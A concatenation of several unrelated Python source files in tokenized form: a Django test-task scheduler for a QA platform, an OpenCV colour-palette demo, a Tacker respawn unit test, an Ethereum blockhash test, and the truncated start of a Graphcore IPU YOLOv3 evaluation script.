{}))<block_end>model_form.instance.belong_env_id=env_id<line_sep>model_form.instance.belong_project_id=project_id<line_sep>model_form.instance.belong_module_id=module_id<line_sep>model_form.instance.start_time=start_time<line_sep>model_form.instance.receiver_email=deal_emails(emails.split(';'))<line_sep>model_form.save()<for_stmt>case_id request.POST.get('case_list').split(',')<block_start>task=TaskInfo.objects.get(task_name=request.POST.get('task_name'))<line_sep>case=TestCaseInfo.objects.get(id=case_id)<line_sep>task.cases.add(case)<block_end><return>JsonResponse(get_ajax_msg(1 1 '添加任务成功' {}))<block_end><else_stmt><block_start>msg=get_validate_form_msg(model_form)<line_sep><return>JsonResponse(get_ajax_msg(0 0 msg))<block_end><block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有创建任务的权限'))<block_end><block_end><def_stmt>task_search request<block_start><if_stmt>request.method<eq>'POST'<block_start>index=int(request.POST.get('index'))<line_sep>task_name=request.POST.get('task_name')<line_sep>project_name=request.POST.get('project_name')<line_sep>module_name=request.POST.get('module_name')<line_sep>tasks=<none><line_sep>env_name_dic={}<line_sep>project_name_dic={}<line_sep>module_name_dic={}<line_sep>count=0<if_stmt>len(task_name)<eq>0<and>len(project_name)<eq>0<and>len(module_name)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '搜索条件无效'))<block_end><else_stmt><block_start>tasks=TaskInfo.objects.all()<if_stmt>len(module_name)<ne>0<and>module_name<ne>'模块名称'<block_start>tasks=tasks.filter(belong_module__module_name__contains=module_name)<block_end><if_stmt>len(project_name)<ne>0<and>project_name<ne>'项目名称'<block_start>tasks=tasks.filter(belong_project__project_name__contains=project_name)<block_end><if_stmt>len(task_name)<ne>0<block_start>tasks=tasks.filter(task_name__contains=task_name)<block_end><block_end><if_stmt>tasks<eq><none><block_start><return>JsonResponse(get_ajax_msg(0 0 '查询出错'))<block_end><if_stmt>tasks<ne><none><and>len(tasks)<g>0<block_start>tasks=filter_tasks_for_user(request.user tasks.order_by('-id') AUTH_VIEW)# 根据用户权限筛选模块 <for_stmt>task tasks<block_start>append_env_dict(task env_name_dic)<line_sep>append_project_dict(task project_name_dic)<line_sep>append_module_dict(task module_name_dic)<block_end><block_end>count=len(tasks)<line_sep>tasks=pagination_for_objects(tasks index)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '搜索成功' {'tasks':data 'count':count 'currPage':index 'envInfo':env_name_dic 'proInfo':project_name_dic 'moduleInfo':module_name_dic}))<block_end><block_end><def_stmt>task_delete request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end><if_stmt>check_perm(request.user tasks[0] AUTH_DELETE)<block_start>tasks[0].delete()<line_sep><return>JsonResponse(get_ajax_msg(1 1 '删除成功' {}))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有删除该任务的权限'))<block_end><block_end><block_end><def_stmt>task_query request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>tasks=filter_tasks_for_user(request.user tasks AUTH_VIEW)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取任务成功' {'tasks':data}))<block_end><block_end><def_stmt>task_update request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_form=TaskModelForm(request.POST)<if_stmt>task_form.is_valid()<block_start>task_id=request.POST.get('id')<line_sep>task_name=request.POST.get('task_name')<line_sep>env_name=request.POST.get('env_name')<line_sep>project_name=request.POST.get('project_name')<line_sep>module_name=request.POST.get('module_name')<line_sep>receiver_email=request.POST.get('receiver_email')<line_sep>case_list=request.POST.get('case_list').split(',')<line_sep>start_time=datetime.datetime.fromtimestamp(int(request.POST.get('start_time'))/1000)<line_sep>interval_minute=request.POST.get('interval_minute')<if_stmt>request.POST.get('is_loop')<eq>'true'<block_start>is_loop=<true><if_stmt>int(interval_minute)<l>1<block_start><return>JsonResponse(get_ajax_msg(0 0 '循环间隔时间不能小于1分钟' {}))<block_end><block_end><elif_stmt>request.POST.get('is_loop')<eq>'false'<block_start>is_loop=<false><block_end><if_stmt>start_time<le>datetime.datetime.now()<block_start>start_time=datetime.datetime.now()<line_sep># return JsonResponse(get_ajax_msg(0, 0, '任务开始时间早于当前时间', {})) <block_end><if_stmt><not>validate_emails(receiver_email.split(';'))<block_start><return>JsonResponse(get_ajax_msg(0 0 '邮箱格式错误'))<block_end># print(deal_emails(receiver_email.split(';'))) <try_stmt><block_start>task=TaskInfo.objects.get(id=task_id)<if_stmt>TaskInfo.objects.filter(task_name=task_name belong_module_id=module_name).exclude(id=task_id).exists()<block_start><return>JsonResponse(get_ajax_msg(0 0 '已存在此任务名称' {}))<block_end><if_stmt><not>task.is_run<block_start><if_stmt>check_perm(request.user TaskInfo.objects.get(id=task_id) AUTH_UPDATE)<block_start><if_stmt>TaskInfo.objects.update_task(task_id task_name=task_name env_name=env_name project_name=project_name module_name=module_name receiver_email=deal_emails(receiver_email.split(';')) case_list=case_list start_time=start_time is_loop=is_loop interval_minute=interval_minute)<block_start><return>JsonResponse(get_ajax_msg(1 1 '修改任务成功' {}))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '修改任务失败' {}))<block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有修改该任务的权限'))<block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '请先停止任务' {}))<block_end><block_end><except_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '该任务不存在' {}))<block_end><block_end><else_stmt><block_start>msg=get_validate_form_msg(task_form)<line_sep><return>JsonResponse(get_ajax_msg(0 1 msg))<block_end><block_end><block_end><def_stmt>task_run request<block_start><global>is_timer_start<line_sep><global>run_task_list<line_sep><global>run_job_dict<if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>task=tasks[0]<if_stmt><not>task.is_run<block_start><if_stmt>task.start_time<g>datetime.datetime.now()# 任务开始时间必须大于当前时间 <block_start><pass><block_end><else_stmt><block_start>task.start_time=datetime.datetime.now()+datetime.timedelta(seconds=10)<block_end># if not is_timer_start: # is_timer_start = True # start_task_timer = StartTaskTimer(run_task_list, run_job_dict) # start_task_timer.start() run_task_list.append(task)<line_sep>task.is_run=<true><line_sep>task.save()<line_sep>connection.close()<line_sep><return>JsonResponse(get_ajax_msg(1 1 '该任务成功运行'))<block_end><else_stmt><block_start>connection.close()<line_sep><return>JsonResponse(get_ajax_msg(0 0 '该任务正在运行'))<block_end><block_end><block_end><def_stmt>task_stop request<block_start><global>run_task_list<line_sep><global>run_job_dict<if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>task=tasks[0]<if_stmt>task.is_run<block_start>task.is_run=<false><line_sep>task.fail_times=0<line_sep>task.save()<line_sep># if task in run_task_list: # run_task_list.remove(task) # 从运行任务列表中删除该任务 <try_stmt># jobs = run_job_dict[task.id] # for job in jobs: <block_start>schedule.cancel_job(task.id)<block_end><except_stmt>KeyError<block_start>print('非循环任务')<block_end><return>JsonResponse(get_ajax_msg(1 1 '该任务成功停止'))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '该任务没有运行'))<block_end><block_end><block_end><def_stmt>task_monitor request<block_start><if_stmt>request.method<eq>'GET'<block_start><return>render(request 'api/task_monitor.html')<block_end><if_stmt>request.method<eq>'POST'<block_start>index=int(request.POST.get('index'))<line_sep>search_task_name=request.POST.get('task_name')<line_sep>start=(index-1)<times>10<line_sep>res=requests.get('http://127.0.0.1:5555/api/tasks?limit=1000')# 控制查询最大数目为1000,以解决查询卡顿的问题 results=json.loads(res.content)<line_sep>monitor_result_list=[]<for_stmt>result results.values()<block_start><try_stmt><block_start>task_dict={}<line_sep>args=result['args'].split(',')<line_sep># 获取任务信息 infos=args[1].split('-')<if_stmt>'定时任务'<in>infos[0]<block_start>task_name=infos[1]<line_sep>case_name=infos[2]<line_sep>report_uuid=args[4].split("'")[1]<line_sep>task_dict['task_name']=task_name<line_sep>task_dict['case_name']=case_name<line_sep>task_dict['state']=result['state']<line_sep>task_dict['result']=result['result']<line_sep>task_dict['received']=result['received']<line_sep>task_dict['started']=result['started']<line_sep>task_dict['runtime']=result['runtime']<line_sep>task_dict['report_uuid']=report_uuid<if_stmt>search_task_name<is><not><none><block_start><if_stmt>search_task_name<in>task_dict['task_name']<block_start>monitor_result_list.append(task_dict)<block_end><block_end><else_stmt><block_start>monitor_result_list.append(task_dict)<block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>print('数据解析异常:'+e)<block_end><block_end># 根据任务开始时间降序排列 <for_stmt>i range(len(monitor_result_list)-1)<block_start><for_stmt>j range(len(monitor_result_list)-i-1)<block_start><if_stmt>monitor_result_list[j]['received']<l>monitor_result_list[j+1]['received']<block_start>monitor_result_list[j],monitor_result_list[j+1]=monitor_result_list[j+1] monitor_result_list[j]<block_end><block_end><block_end>data=dataToJson(monitor_result_list[start:start+10])<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取监控任务列表成功' {'monitors':data 'count':len(monitor_result_list) 'currPage':index}))<block_end><block_end><def_stmt>thread_run_case **kwargs<block_start>case_id=kwargs['case_id']<line_sep>base_url=kwargs['base_url']<line_sep>task_name=kwargs['task_name']<line_sep>task_id=kwargs['task_id']<line_sep>threading.Thread(target=run_case args=(base_url case_id task_name task_id)).start()<block_end><def_stmt>run_case base_url case_id task_name task_id<block_start>report_id=run_case_by_id(base_url case_id task_name "定时任务" isTask=<true>)<line_sep>time.sleep(5)# 等待报告信息写入数据库 reports=ReportInfo.objects.all().filter(report_id=report_id)<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<g>0<block_start>task=tasks[0]<block_end><if_stmt>len(reports)<eq>0# 若没有此条报告,则认为用例成功,不再需要后续操作 <block_start><if_stmt>len(tasks)<g>0<block_start>task.fail_times=0<line_sep>task.save()<block_end><block_end><else_stmt><block_start>response_result=get_response_result(report_id)<if_stmt>response_result<ne><true><block_start>task.fail_times<augadd>1<line_sep>task.save()<line_sep># 存失败记录 failRecord=TaskFailedRecord(task_id=task report_id=reports[0].id time=datetime.datetime.fromtimestamp(reports[0].test_time))<line_sep>failRecord.save()<block_end><if_stmt>task.fail_times%2<eq>0<and>task.fail_times<ne>0<block_start>receivers=task.receiver_email.split(';')<for_stmt>receiver receivers<block_start>send_warn_mail(task_name receiver reports[0].id)<block_end><block_end><block_end>connection.close()<block_end># 避免造成mysql连接数过多的问题 <def_stmt>get_response_result report_id<block_start>response_result=<true><try_stmt><block_start>reports=ReportInfo.objects.all().filter(report_id=report_id)<if_stmt>len(reports)<g>0<block_start>report=reports[0]<line_sep># print(report.result_data) summury=json.loads(report.result_data)<line_sep>stat=summury['stat']<if_stmt>stat['successes']<ne>stat['testsRun']<block_start>response_result=<false><block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>print('get_response_code e=====>' e)<block_end><return>response_result<block_end><def_stmt>send_warn_mail task_name receiver report_id<block_start>tips=task_name+':监控到接口发生异常!查看报告地址:http://qa.15166.com/api/get_report/?id='+str(report_id)<try_stmt><block_start>email_title="Joy_QA_Platform 定时任务监控接口"<line_sep>email_body=tips<line_sep># 使用Django内置函数完成邮件发送。四个参数:主题,邮件内容,从哪里发,接受者list send_status=send_mail(email_title email_body EMAIL_FROM [receiver])<block_end><except_stmt>Exception<as>e<block_start>print(e)<block_end><block_end><def_stmt>task2Dict task<block_start>task_dict={}<line_sep>task_dict["id"]=task.id<line_sep>task_dict["task_name"]=task.task_name<line_sep>task_dict["belong_env"]=task.belong_env_id<line_sep>task_dict["belong_project"]=task.belong_project_id<line_sep>task_dict["belong_module"]=task.belong_module_id<line_sep>task_dict["receiver_email"]=task.receiver_email<line_sep>task_dict["case_id_list"]=[]<line_sep>task_dict["case_name_list"]=[]<line_sep>task_dict["start_time"]=task.start_time<line_sep>task_dict["is_loop"]=task.is_loop<line_sep>task_dict["interval_minute"]=task.interval_minute<line_sep>task_dict["is_run"]=task.is_run<line_sep>task_dict["fail_times"]=task.fail_times<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>id=case.id<line_sep>task_dict["case_id_list"].append(case.id)<line_sep>task_dict["case_name_list"].append(case.name)<block_end><return>task_dict<block_end><def_stmt>append_env_dict task env_dict<block_start>env_id=task.belong_env_id<line_sep>env_name=task.belong_env.env_name<line_sep>env_dict[str(env_id)]=env_name<block_end><def_stmt>append_project_dict task project_dict<block_start>project_id=task.belong_project_id<line_sep>project_name=task.belong_project.project_name<line_sep>project_dict[str(project_id)]=project_name<block_end><def_stmt>append_module_dict task module_dict<block_start>module_id=task.belong_module_id<line_sep>module_name=task.belong_module.module_name<line_sep>module_dict[str(module_id)]=module_name<block_end><def_stmt>get_url_from_task task<block_start>envs=EnvInfo.objects.filter(id=task.belong_env_id)<line_sep>env=envs[0]<line_sep><return>env.host_port<block_end><class_stmt>StartTaskTimer(threading.Thread)<block_start><def_stmt>__init__ self run_task_list run_job_dict<block_start>threading.Thread.__init__(self)<line_sep>self.run_task_list=run_task_list<line_sep>self.run_job_dict=run_job_dict<block_end><def_stmt>run self<block_start><while_stmt><true># lst = self.run_task_list[::] <block_start>tasks=get_running_tasks()<for_stmt>task tasks<block_start>now=datetime.datetime.now()<if_stmt>task.start_time<le>now<le>(task.start_time+datetime.timedelta(seconds=5))<block_start><if_stmt>task.is_loop<block_start>self.run_job_dict[task.id]=start_loop_task(task thread_run_case)<block_end><else_stmt><block_start>start_task(task thread_run_case)<line_sep>task.is_run=<false><line_sep>task.fail_times=0<line_sep>task.save()<line_sep># self.run_task_list.remove(task) <block_end><block_end><else_stmt><block_start><pass><block_end><block_end>time.sleep(5)<block_end><block_end><block_end>mutex=threading.Lock()<def_stmt>get_running_tasks <block_start><global>mutex<with_stmt>mutex<block_start>result=[]<line_sep>tasks=TaskInfo.objects.filter(is_run=<true> is_loop=<true>)<line_sep>now=datetime.datetime.now()<for_stmt>task tasks# 排除可能的重复执行 <block_start><if_stmt>task.start_time<le>now<le>(task.start_time+datetime.timedelta(seconds=5))<and>(now-task.last_run_time<g>datetime.timedelta(seconds=5))<block_start>result.append(task)<line_sep>task.last_run_time=now<line_sep>task.save()<block_end># if datetime.datetime.now() - task.last_run_time > datetime.timedelta(seconds=task.interval_minute * 60 - 5): # result.append(task) <block_end>connection.close()<if_stmt>len(result)<g>0<block_start><for_stmt>i result<block_start>print("获取到任务:" i.task_name)<block_end><block_end><return>result<block_end><block_end><def_stmt>start_loop_task task func<block_start>base_url=get_url_from_task(task)<line_sep>jobs=[]<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>task_name=get_task_name(task case)<line_sep>func(case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<line_sep>job=schedule.every(task.interval_minute).minutes.do(thread_run_case case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<line_sep>cache.set("qa_paltform_loop_jobs_"+str(datetime.datetime.now()) pickle.dumps(job) timeout=<none>)<block_end>flag=cache.get("qa_test_platform_running_flag")<line_sep># print("flag==="+str(flag)) <if_stmt>flag<ne>1<block_start>schedule.run_continuously()<line_sep># 一定要添加过期时间,否则当值过期时还会起新的线程(发现默认过期时间5分钟,这是django-redis组件和原生redis的区别) cache.set("qa_test_platform_running_flag" 1 timeout=<none>)<block_end><return>jobs<block_end><def_stmt>start_task task func<block_start>base_url=get_url_from_task(task)<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>task_name=get_task_name(task case)<line_sep>func(case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<block_end><block_end><def_stmt>get_task_name task case<block_start>name='定时任务'+'-'+task.task_name+'-'+case.name<line_sep><return>name<block_end><def_stmt>filter_tasks_for_user user tasks perm<block_start>results=[]<for_stmt>task tasks<block_start>project=task.belong_project<if_stmt>user.has_perm(perm project)<block_start>results.append(task)<block_end><block_end><return>results<block_end><def_stmt>check_perm user task perm<block_start>project=task.belong_project<line_sep><return>user.has_perm(perm project)<block_end><def_stmt>restart_running_task # 清除redis中的任务缓存 <block_start>cache.delete_pattern("qa_paltform_loop_jobs_*")<line_sep># 清除redis中的分布式锁,避免偶发的锁出现问题,任务会在执行器中的run_pending阻塞 cache.delete_pattern('*qa_test_platform_get')<line_sep># 增加是否已经启动了线程的标记,避免每增加一个执行任务就启动一次线程,可能导致任务重复执行 cache.delete_pattern('qa_test_platform_running_flag')<line_sep>print("清除任务缓存、清除锁、清除线程启动标记")<line_sep>start_task_timer=StartTaskTimer(run_task_list run_job_dict)<line_sep>start_task_timer.start()<line_sep>tasks=TaskInfo.objects.filter(is_run=<true> is_loop=<true>)<line_sep>count=0<for_stmt>task tasks<block_start>task.start_time=datetime.datetime.now()+datetime.timedelta(seconds=10<times>(count+1))<line_sep>task.save()<line_sep>count=count+1<block_end>connection.close()<block_end># 避免造成mysql连接数过多的问题 <def_stmt>validate_emails emails<block_start><for_stmt>email emails<block_start><if_stmt>len(email)<eq>0<block_start><continue><block_end><if_stmt>re.match("^[A-Z0-9a-z._%+-]+"+EMAIL_SUFFIX email)<is><none><block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>deal_emails emails<block_start>result=[]<for_stmt>email emails<block_start><if_stmt>email<not><in>result<block_start>result.append(email)<block_end><block_end>resultEmail=""<for_stmt>email result<block_start>resultEmail=resultEmail+";"+email<block_end><return>resultEmail[1:]<block_end>
#coding=utf-8 #调色板 <import_stmt>cv2<import_stmt>numpy<as>np<line_sep>img=np.zeros((300 512 3) np.uint8)<line_sep>cv2.namedWindow('image')<def_stmt>callback x<block_start><pass><block_end>#参数1:名称;参数2:作用窗口,参数3、4:最小值和最大值;参数5:值更改回调方法 cv2.createTrackbar('R' 'image' 0 255 callback)<line_sep>cv2.createTrackbar('G' 'image' 0 255 callback)<line_sep>cv2.createTrackbar('B' 'image' 0 255 callback)<while_stmt>(1)<block_start>cv2.imshow('image' img)<if_stmt>cv2.waitKey(1)&0xFF<eq>ord('q')<block_start><break><block_end>r=cv2.getTrackbarPos('R' 'image')<line_sep>g=cv2.getTrackbarPos('G' 'image')<line_sep>b=cv2.getTrackbarPos('B' 'image')<line_sep>img[:]=[b g r]<block_end>cv2.destroyAllWindows()<line_sep>
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd. # All Rights Reserved # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>testtools<import_from_stmt>unittest mock<import_from_stmt>tacker.common clients<import_from_stmt>tacker context<import_from_stmt>tacker.db.common_services common_services_db_plugin<import_from_stmt>tacker.plugins.common constants<import_from_stmt>tacker.vnfm.infra_drivers.openstack heat_client<as>hc<import_from_stmt>tacker.vnfm.policy_actions.respawn respawn<as>policy_actions_respawn<import_from_stmt>tacker.vnfm vim_client<class_stmt>VNFActionRespawn(testtools.TestCase)<block_start><def_stmt>setUp self<block_start>super(VNFActionRespawn self).setUp()<line_sep>self.context=context.get_admin_context()<line_sep>mock.patch('tacker.db.common_services.common_services_db_plugin.'<concat>'CommonServicesPluginDb.create_event').start()<line_sep>self._cos_db_plugin=common_services_db_plugin.CommonServicesPluginDb()<block_end>@mock.patch.object(clients.OpenstackClients 'heat')@mock.patch.object(hc.HeatClient 'delete')@mock.patch.object(vim_client.VimClient 'get_vim')<def_stmt>test_execute_action self mock_get_vim mock_hc_delete mock_heat<block_start>action_respawn=policy_actions_respawn.VNFActionRespawn()<line_sep>vnf_dict={'id':'fake-id' 'status':'fake-status' 'attributes':{'monitoring_policy':'fake-monitoring-policy' 'failure_count':'1' 'dead_instance_id_1':'00000000-0000-0000-0000-00000000001'} 'vim_id':'fake-vim-id' 'vim_auth':'fake-vim-auth' 'instance_id':'00000000-0000-0000-0000-000000000002' 'placement_attr':{'region_name':'fake-region-name'}}<line_sep>mock_get_vim.return_value={'vim_auth':{'auth_url':'http://fake-url/identity/v3'}}<line_sep>mock_hc_delete.return_value=<true><line_sep>plugin=mock.Mock()<line_sep>plugin._mark_vnf_dead.return_value=<true><line_sep>plugin.create_vnf_sync.return_value={'id':'fake-id'}<line_sep>plugin._vnf_monitor=mock.Mock()<line_sep>action_respawn.execute_action(plugin self.context vnf_dict <none>)<line_sep>self._cos_db_plugin.create_event.assert_called_once_with(self.context res_id=vnf_dict['id'] res_state=vnf_dict['status'] res_type=constants.RES_TYPE_VNF evt_type=constants.RES_EVT_MONITOR tstamp=mock.ANY details="ActionRespawnHeat invoked")<line_sep>mock_get_vim.assert_called_once_with(self.context vnf_dict['vim_id'])<line_sep>plugin.create_vnf_sync.assert_called_with(self.context vnf_dict)<line_sep>plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])<block_end><block_end>
<import_from_stmt>ethereum tester vm<import_from_stmt>ethereum.utils sha3 encode_int32 safe_ord encode_hex<import_from_stmt>ethereum.state_transition apply_message<line_sep>s=tester.state()<line_sep>c=s.contract('eip_96_blockhash_getter.se.py')<line_sep>blockhash_addr=b'\x00'<times>19+b'\x10'<line_sep>system_addr=b'\xff'<times>19+b'\xfe'<line_sep>s.state.set_code(blockhash_addr s.state.get_code(c))<def_stmt>mk_hash_setting_message data<block_start><return>vm.Message(sender=system_addr to=blockhash_addr value=0 gas=1000000 data=data)<block_end>print("Setting block hashes")<for_stmt>i range(1 1000)<block_start>s.state.block_number=i+1<line_sep>o=apply_message(s.state mk_hash_setting_message(sha3(str(i))))<if_stmt>i%100<eq>0<block_start>print("Set %d"%i)<block_end><block_end>print("Testing reads")<line_sep>s.state.block_number=1000<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(999))<eq>sha3(str(999))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(998))<eq>sha3(str(998))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(744))<eq>sha3(str(744))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(743))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(1000))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(1001))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(513))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(512))<eq>sha3(str(512))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(511))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(256))<eq>sha3(str(256))<line_sep>print("Tests passed!")<line_sep>print("EVM code: 0x%s"%encode_hex(s.state.get_code(blockhash_addr)))<line_sep>
#! /usr/bin/env python # coding=utf-8 # Copyright (c) 2021 Graphcore Ltd. All Rights Reserved. # Copyright (c) 2019 YunYang1994 <<EMAIL>> # License: MIT (https://opensource.org/licenses/MIT) # This file has been modified by Graphcore Ltd. <import_stmt>argparse<import_stmt>json<import_stmt>math<import_stmt>os<import_stmt>shutil<import_stmt>time<import_stmt>numpy<as>np<import_stmt>core.utils<as>utils<import_stmt>cv2<import_stmt>log<import_stmt>tensorflow<as>tf<import_from_stmt>core.dataset Dataset<import_from_stmt>core.yolov3 YOLOV3<import_from_stmt>ipu_utils stages_constructor<import_from_stmt>log logger<import_from_stmt>tensorflow.python ipu<import_from_stmt>tensorflow.python.ipu ipu_infeed_queue ipu_outfeed_queue loops<class_stmt>YoloTest(object)<block_start><def_stmt>__init__ self opts<block_start>self.input_size=opts["test"]["input_size"]<line_sep>self.classes=utils.read_class_names(opts["yolo"]["classes"])<line_sep>self.num_classes=len(self.classes)<line_sep>self.score_threshold=opts["test"]["score_threshold"]<line_sep>self.iou_threshold=opts["test"]["iou_threshold"]<line_sep>self.moving_avg_decay=opts["yolo"]["moving_avg_decay"]<line_sep>self.annotation_path=opts["test"]["annot_path"]<line_sep>self.weight_file=opts["test"]["weight_file"]<line_sep>self.write_image=opts["test"]["write_image"]<line_sep>self.write_image_path=opts["test"]["write_image_path"]<line_sep>self.show_label=opts["test"]["show_label"]<line_sep>self.batch_size=opts["test"]["batch_size"]<line_sep>self.precision=tf.float16<if>opts["yolo"]["precision"]<eq>"fp16"<else>tf.float32<line_sep>self.use_moving_avg=opts["yolo"]["use_moving_avg"]<line_sep>self.repeat_count=opts["test"]["repeat_count"]<line_sep>self.use_infeed_queue=opts["test"]["use_infeed_queue"]<line_sep>self.predicted_file_path=opts["test"]["predicted_file_path"]<line_sep>self.ground_truth_file_path=opts["test"]["ground_truth_file_path"]<line_sep>self.meta_dict={}<line_sep>self.testset=Dataset("test" opts)<line_sep># Configure arguments for targeting the IPU config=ipu.config.IPUConfig()<line_sep>config.auto_select_ipus=1<line_sep>config.configure_ipu_system()<line_sep>model=YOLOV3(<false> opts)<line_sep># construct model # we will put whole network on one ipu layers=[]<line_sep># build layer functions for backbone and upsample layers.extend(model.build_backbone())<line_sep># last layer of darknet53 is classification layer, so it have 52 conv layers <assert_stmt>len(layers)<eq>52<line_sep>layers.extend(model.build_upsample())<line_sep># there is 25 conv layers if we count upsmaple as a conv layer <assert_stmt>len(layers)<eq>52+25<line_sep># decoding layer and loss layer is always put on last IPU layers.append(model.decode_boxes)<line_sep># reuse stages_constructor so we don't need to pass params by hand network_func=stages_constructor([layers] ["input_data" "nums"] ["pred_sbbox" "pred_mbbox" "pred_lbbox" "nums"])[0]<line_sep>input_shape=(self.batch_size self.input_size self.input_size 3)<line_sep>self.lines,self.image_dict=self.load_data()<if_stmt>self.use_infeed_queue# The dataset for feeding the graphs <block_start><def_stmt>data_gen <block_start><return>self.data_generator()<block_end><with_stmt>tf.device("cpu")<block_start>ds=tf.data.Dataset.from_generator(data_gen output_types=(tf.float16 tf.int32) output_shapes=(input_shape (self.batch_size )))<block_end>ds=ds.repeat()<line_sep>ds=ds.prefetch(self.repeat_count<times>10)<line_sep># The host side queues infeed_queue=ipu_infeed_queue.IPUInfeedQueue(ds)<line_sep>outfeed_queue=ipu_outfeed_queue.IPUOutfeedQueue()<def_stmt>model_func input_data nums<block_start>pred_sbbox,pred_mbbox,pred_lbbox,nums=network_func(input_data nums)<line_sep>outfeed=outfeed_queue.enqueue({"pred_sbbox":pred_sbbox "pred_mbbox":pred_mbbox "pred_lbbox":pred_lbbox "nums":nums})<line_sep><return>outfeed<block_end><def_stmt>my_net <block_start>r=loops.repeat(self.repeat_count model_func [] infeed_queue)<line_sep><return>r<block_end><with_stmt>ipu.scopes.ipu_scope("/device:IPU:0")<block_start>self.run_loop=ipu.ipu_compiler.compile(my_net inputs=[])<block_end># The outfeed dequeue has to happen after the outfeed enqueue self.dequeue_outfeed=outfeed_queue.dequeue()<line_sep>self.sess=tf.Session(config=tf.ConfigProto())<line_sep>self.sess.run(infeed_queue.initializer)<block_end><else_stmt># if using feed dict, it will be simpler # the cost is throughput <block_start><with_stmt>tf.device("cpu")<block_start><with_stmt>tf.name_scope("input")# three channel images <block_start>self.input_data=tf.placeholder(shape=input_shape dtype=self.precision name="input_data")<line_sep>self.nums=tf.placeholder(shape=(self.batch_size) dtype=tf.int32 name="nums")<block_end><block_end><with_stmt>ipu.scopes.ipu_scope("/device:IPU:0")<block_start>self.output=ipu.ipu_compiler.compile(network_func [self.input_data self.nums])<block_end>self.sess=tf.Session(config=tf.ConfigProto())<block_end><if_stmt>self.use_moving_avg<block_start><with_stmt>tf.name_scope("ema")<block_start>ema_obj=tf.train.ExponentialMovingAverage(self.moving_avg_decay)<block_end>self.saver=tf.train.Saver(ema_obj.variables_to_restore())<block_end><else_stmt><block_start>self.saver=tf.train.Saver()<block_end>self.saver.restore(self.sess self.weight_file)<block_end><def_stmt>load_data self<block_start><with_stmt>open(self.annotation_path "r")<as>annotation_file# load_all images <block_start>lines=[]<for_stmt>line annotation_file<block_start>lines.append(line)<block_end><block_end>image_dict=self.testset.load_images(dump=<false>)<line_sep><return>lines image_dict<block_end><def_stmt>data_generator self<block_start>"""Generate input image and write groundtruth info """<if_stmt>os.path.exists(self.write_image_path)<block_start>shutil.rmtree(self.write_image_path)<block_end>os.mkdir(self.write_image_path)<line_sep>self.ground_truth_file=open(self.ground_truth_file_path "w")<line_sep>image_datas=[]<line_sep>nums=[]<for_stmt>num,line enumerate(self.lines)<block_start>annotation=line.strip().split()<line_sep>image_path=annotation[0]<line_sep>image_name=image_path.split("/")[-1]<line_sep>image=self.image_dict[line.strip()]<line_sep>bbox_data_gt=np.array([list(map(int box.split(",")))<for>box 